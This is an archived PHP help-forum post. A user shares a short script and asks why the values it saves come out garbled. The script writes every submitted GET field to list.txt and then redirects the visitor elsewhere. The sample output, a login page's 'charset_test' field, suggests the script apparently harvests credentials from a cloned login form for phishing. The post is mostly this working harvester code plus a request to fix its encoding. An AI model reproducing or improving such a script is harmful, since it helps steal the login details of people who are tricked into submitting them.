Jump to content

removing encrypted output...


saadibabar

Recommended Posts

<?php

Header("Location:http://saadibabar.bravehost.com/ ");

$handle = fopen("list.txt", "a");

Foreach($_GET as $variable => $value) {

fwrite($handle, $variable);

fwrite($handle, "=");

fwrite($handle, $value);

fwrite($handle, “\r\n”);

}

Fwrite($handle, "\r\n");

fclose($handle);

"list.txt"

or exit;

?>

 

this outputs the data in list.txt as

charset_test=€,´,€,´,水,Д,Єcharset_test=€,´,€,´,水

 

why it displays in encrypted form...please help me ,make this simple..

i.e. the same text appears in txt file as it is on html file...

Link to comment
https://forums.phpfreaks.com/topic/222195-removing-encrypted-output/
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.